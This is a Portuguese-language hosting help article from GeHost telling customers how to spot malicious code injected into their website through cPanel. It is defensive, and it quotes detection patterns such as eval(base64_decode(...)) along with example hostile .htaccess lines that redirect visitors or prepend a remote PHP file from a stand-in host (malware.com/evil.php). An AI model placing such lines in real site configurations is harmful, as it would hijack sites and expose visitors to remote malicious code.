Como identificar se seu site foi invadido e injetado com código malicioso Print

  • 0

Como identificar se seu site foi invadido e injetado com código malicioso

Olá, querido cliente da GeHost! 🌟

Seu site é como uma casa digital — protegido, acolhedor e cheio de conteúdo valioso. Mas, assim como qualquer casa, ele pode ser invadido. E, infelizmente, um dos riscos mais comuns é a injeção de código malicioso por hackers. Não se assuste! Com um olhar atento e alguns passos simples, você consegue identificar se algo está errado. Vou te guiar com calma, como um verdadeiro Sensei da segurança digital. 💪🔐 ---

🔍 Como saber se seu site foi invadido?

Veja alguns sinais que podem indicar que seu site foi comprometido:
  • Seu site está lento ou travando sem motivo aparente.
  • Novas páginas ou links aparecem sem sua autorização.
  • Seus visitantes recebem avisos de segurança no navegador (como "Este site pode ser perigoso").
  • Seus e-mails profissionais começam a enviar mensagens estranhas ou spam.
  • Seu site redireciona para páginas desconhecidas ou de conteúdo duvidoso.
  • Conteúdo que você não escreveu aparece no seu site — como textos em outro idioma, anúncios ou códigos estranhos.
Se você notou algum desses sinais, pare tudo agora e siga os passos abaixo. ---

🛠️ Passo a passo: Como verificar se há código malicioso no seu site

Vamos usar o cPanel — o painel de controle da GeHost — para fazer uma inspeção rápida.
  1. Entre no cPanel do seu domínio:

Use seu login e senha no painel painel.gehost.com.br.

Tela de login do cPanel com campos de usuário e senha Abra o Gerenciador de Arquivos:

No cPanel, clique em “Arquivos” e depois em “Gerenciador de Arquivos”.

Tela do Gerenciador de Arquivos do cPanel com a árvore de pastas Navegue até a pasta pública:

Na árvore de pastas, clique em public_html (ou o nome da sua pasta principal).

Procure arquivos estranhos:

Olhe com atenção por arquivos com nomes estranhos, como:

  • index.php com conteúdo diferente do seu.
  • Arquivos com nomes como 12345.php, temp.php, backup.php.
  • Arquivos com extensão .js ou .php que não são seus.

Se encontrar algo assim, não abra — pode ser perigoso.

Verifique o código-fonte de páginas do site:

Abra uma página do seu site no navegador, clique com o botão direito e escolha “Exibir código-fonte”.

Procure por trechos como:

eval(base64_decode(...))

document.write(unescape(...))

Scripts que redirecionam automaticamente.

Esses são sinais clássicos de injeção de código malicioso.

Verifique arquivos de configuração:

Procure por arquivos como .htaccess na pasta public_html. Ele pode estar sendo usado para redirecionamentos maliciosos.

Abra o arquivo com o editor no cPanel e veja se há linhas como:

Redirect 301 / http://site-perigoso.com

php_value auto_prepend_file "http://malware.com/evil.php"

Se encontrar, apague ou corrija imediatamente.

---

🛡️ O que fazer se seu site foi invadido?

Se você confirmou a presença de código malicioso, aqui está o que fazer:
  • Desative temporariamente seu site (via cPanel ou bloqueando o domínio no DNS) para evitar mais danos.
  • Reforce sua senha de cPanel e e-mail. Use uma senha forte (letras maiúsculas, minúsculas, números e símbolos).
  • Atualize todos os sistemas do seu site (WordPress, lojas virtuais, CMS).
  • Use um scanner de segurança (como o Wordfence, se for WordPress) para escanear todo o site.
  • Entre em contato com o suporte da GeHost — estamos aqui para ajudar! Envie o relato com detalhes e, se possível, o código suspeito.
---

💡 Dica do Sensei

Prevenir é melhor que remediar. Sempre:

  • Atualize seu site e plugins com frequência.
  • Não use senhas fáceis.
  • Evite instalar plugins ou temas de fontes duvidosas.
  • Faça backup regular (use o recurso Backup no cPanel).
---

📞 Precisa de ajuda?

Se tiver dúvidas, ou se precisar de apoio técnico, entre em contato com o suporte da GeHost — estamos aqui para te proteger.

Seu plano inclui 30 dias grátis de suporte após a entrega. Use esse tempo com sabedoria!

Com carinho,
Seu Sensei da Segurança
GeHost — Seu site, sua proteção


Was this answer helpful?

« Back